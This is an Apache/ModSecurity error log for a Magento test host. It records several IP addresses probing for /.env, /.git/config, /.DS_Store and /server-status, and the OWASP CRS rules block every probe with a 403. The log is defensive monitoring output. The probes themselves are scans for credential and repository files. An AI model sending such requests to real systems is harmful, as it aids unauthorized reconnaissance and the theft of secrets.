[Tue Oct 28 12:20:00.964669 2025] [:error] [pid 3819782] [client 128.199.182.77:47020] [client 128.199.182.77] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aQCm4HK1uhqb2Kc0XPArUwAAAAQ"]
[Tue Oct 28 12:20:01.997465 2025] [:error] [pid 3820002] [client 128.199.182.77:47022] [client 128.199.182.77] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env"] [unique_id "aQCm4RGNgAnFnvqbwgf8dAAAAAc"]
[Tue Oct 28 12:20:01.997685 2025] [:error] [pid 3820002] [client 128.199.182.77:47022] [client 128.199.182.77] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env"] [unique_id "aQCm4RGNgAnFnvqbwgf8dAAAAAc"]
[Tue Oct 28 12:20:01.997845 2025] [:error] [pid 3820002] [client 128.199.182.77:47022] [client 128.199.182.77] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env"] [unique_id "aQCm4RGNgAnFnvqbwgf8dAAAAAc"]
[Tue Oct 28 12:20:02.995715 2025] [:error] [pid 3819779] [client 128.199.182.77:47034] [client 128.199.182.77] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aQCm4h4Fxk7mjz8REGmzmwAAAAE"]
[Tue Oct 28 12:20:02.995925 2025] [:error] [pid 3819779] [client 128.199.182.77:47034] [client 128.199.182.77] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aQCm4h4Fxk7mjz8REGmzmwAAAAE"]
[Tue Oct 28 12:20:02.996093 2025] [:error] [pid 3819779] [client 128.199.182.77:47034] [client 128.199.182.77] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aQCm4h4Fxk7mjz8REGmzmwAAAAE"]
[Tue Oct 28 17:00:43.004337 2025] [authz_core:error] [pid 3820001] [client 165.22.34.189:35958] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/server-status
[Tue Oct 28 17:00:43.984142 2025] [:error] [pid 3819780] [client 165.22.34.189:35978] [client 165.22.34.189] ModSecurity: Warning. Matched phrase "/.DS_Store" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.DS_Store found within REQUEST_FILENAME: /.ds_store"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aQDoq5tXQiG0l_1IJJNuKAAAAAI"]
[Tue Oct 28 17:00:43.984429 2025] [:error] [pid 3819780] [client 165.22.34.189:35978] [client 165.22.34.189] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aQDoq5tXQiG0l_1IJJNuKAAAAAI"]
[Tue Oct 28 17:00:43.984653 2025] [:error] [pid 3819780] [client 165.22.34.189:35978] [client 165.22.34.189] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aQDoq5tXQiG0l_1IJJNuKAAAAAI"]
[Tue Oct 28 17:00:44.275794 2025] [:error] [pid 3820002] [client 165.22.34.189:35988] [client 165.22.34.189] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env"] [unique_id "aQDorBGNgAnFnvqbwgf8jwAAAAc"]
[Tue Oct 28 17:00:44.276001 2025] [:error] [pid 3820002] [client 165.22.34.189:35988] [client 165.22.34.189] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env"] [unique_id "aQDorBGNgAnFnvqbwgf8jwAAAAc"]
[Tue Oct 28 17:00:44.276155 2025] [:error] [pid 3820002] [client 165.22.34.189:35988] [client 165.22.34.189] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env"] [unique_id "aQDorBGNgAnFnvqbwgf8jwAAAAc"]
[Tue Oct 28 17:00:44.565626 2025] [:error] [pid 3819781] [client 165.22.34.189:35992] [client 165.22.34.189] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aQDorCemdjGHqXki4RKLHAAAAAM"]
[Tue Oct 28 17:00:44.565850 2025] [:error] [pid 3819781] [client 165.22.34.189:35992] [client 165.22.34.189] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aQDorCemdjGHqXki4RKLHAAAAAM"]
[Tue Oct 28 17:00:44.566027 2025] [:error] [pid 3819781] [client 165.22.34.189:35992] [client 165.22.34.189] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aQDorCemdjGHqXki4RKLHAAAAAM"]
[Sat Nov 01 17:28:01.500860 2025] [authz_core:error] [pid 3922698] [client 139.59.132.8:46754] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/server-status
[Sat Nov 01 17:28:01.765252 2025] [:error] [pid 3922700] [client 139.59.132.8:46774] [client 139.59.132.8] ModSecurity: Warning. Matched phrase "/.DS_Store" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.DS_Store found within REQUEST_FILENAME: /.ds_store"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aQY1ETL7-Io0311_z-darQAAABU"]
[Sat Nov 01 17:28:01.765459 2025] [:error] [pid 3922700] [client 139.59.132.8:46774] [client 139.59.132.8] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aQY1ETL7-Io0311_z-darQAAABU"]
[Sat Nov 01 17:28:01.765618 2025] [:error] [pid 3922700] [client 139.59.132.8:46774] [client 139.59.132.8] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aQY1ETL7-Io0311_z-darQAAABU"]
[Sat Nov 01 17:28:01.820970 2025] [:error] [pid 3933628] [client 139.59.132.8:46784] [client 139.59.132.8] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env"] [unique_id "aQY1EY9OSPqeeWqzRENXUgAAAAA"]
[Sat Nov 01 17:28:01.821243 2025] [:error] [pid 3933628] [client 139.59.132.8:46784] [client 139.59.132.8] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env"] [unique_id "aQY1EY9OSPqeeWqzRENXUgAAAAA"]
[Sat Nov 01 17:28:01.821407 2025] [:error] [pid 3933628] [client 139.59.132.8:46784] [client 139.59.132.8] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env"] [unique_id "aQY1EY9OSPqeeWqzRENXUgAAAAA"]
[Sat Nov 01 17:28:01.873616 2025] [:error] [pid 3922694] [client 139.59.132.8:46788] [client 139.59.132.8] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aQY1EXhEOnquNE1Fm9iHpgAAAA4"]
[Sat Nov 01 17:28:01.873834 2025] [:error] [pid 3922694] [client 139.59.132.8:46788] [client 139.59.132.8] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aQY1EXhEOnquNE1Fm9iHpgAAAA4"]
[Sat Nov 01 17:28:01.873993 2025] [:error] [pid 3922694] [client 139.59.132.8:46788] [client 139.59.132.8] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aQY1EXhEOnquNE1Fm9iHpgAAAA4"]
[Sun Nov 02 11:54:33.833979 2025] [authz_core:error] [pid 3948242] [client 165.227.84.14:41392] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/server-status
[Sun Nov 02 11:54:34.848613 2025] [:error] [pid 3949426] [client 165.227.84.14:41418] [client 165.227.84.14] ModSecurity: Warning. Matched phrase "/.DS_Store" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.DS_Store found within REQUEST_FILENAME: /.ds_store"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aQc4av2m7YlOeq-HsmvUDgAAAAE"]
[Sun Nov 02 11:54:34.848849 2025] [:error] [pid 3949426] [client 165.227.84.14:41418] [client 165.227.84.14] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aQc4av2m7YlOeq-HsmvUDgAAAAE"]
[Sun Nov 02 11:54:34.849023 2025] [:error] [pid 3949426] [client 165.227.84.14:41418] [client 165.227.84.14] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aQc4av2m7YlOeq-HsmvUDgAAAAE"]
[Sun Nov 02 11:54:35.138466 2025] [:error] [pid 3949427] [client 165.227.84.14:41430] [client 165.227.84.14] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env"] [unique_id "aQc4a_Y09y_MoLVwr24f-gAAAAc"]
[Sun Nov 02 11:54:35.138676 2025] [:error] [pid 3949427] [client 165.227.84.14:41430] [client 165.227.84.14] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env"] [unique_id "aQc4a_Y09y_MoLVwr24f-gAAAAc"]
[Sun Nov 02 11:54:35.138835 2025] [:error] [pid 3949427] [client 165.227.84.14:41430] [client 165.227.84.14] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env"] [unique_id "aQc4a_Y09y_MoLVwr24f-gAAAAc"]
[Sun Nov 02 11:54:35.424568 2025] [:error] [pid 3947656] [client 165.227.84.14:41444] [client 165.227.84.14] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aQc4a1IpfUnneYeG2cF-QQAAAAw"]
[Sun Nov 02 11:54:35.424839 2025] [:error] [pid 3947656] [client 165.227.84.14:41444] [client 165.227.84.14] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aQc4a1IpfUnneYeG2cF-QQAAAAw"]
[Sun Nov 02 11:54:35.425010 2025] [:error] [pid 3947656] [client 165.227.84.14:41444] [client 165.227.84.14] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aQc4a1IpfUnneYeG2cF-QQAAAAw"]
[Mon Nov 03 01:36:23.594222 2025] [authz_core:error] [pid 3966360] [client 139.59.143.102:34508] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/server-status
[Mon Nov 03 01:36:24.161076 2025] [:error] [pid 3966437] [client 139.59.143.102:34542] [client 139.59.143.102] ModSecurity: Warning. Matched phrase "/.DS_Store" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.DS_Store found within REQUEST_FILENAME: /.ds_store"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aQf5CIjFo9YA5S9TpgJowQAAAAM"]
[Mon Nov 03 01:36:24.161371 2025] [:error] [pid 3966437] [client 139.59.143.102:34542] [client 139.59.143.102] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aQf5CIjFo9YA5S9TpgJowQAAAAM"]
[Mon Nov 03 01:36:24.161572 2025] [:error] [pid 3966437] [client 139.59.143.102:34542] [client 139.59.143.102] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aQf5CIjFo9YA5S9TpgJowQAAAAM"]
[Mon Nov 03 01:36:24.302893 2025] [:error] [pid 3966419] [client 139.59.143.102:34548] [client 139.59.143.102] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env"] [unique_id "aQf5CAV07IBDLooEoB9WvgAAAAA"]
[Mon Nov 03 01:36:24.303108 2025] [:error] [pid 3966419] [client 139.59.143.102:34548] [client 139.59.143.102] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env"] [unique_id "aQf5CAV07IBDLooEoB9WvgAAAAA"]
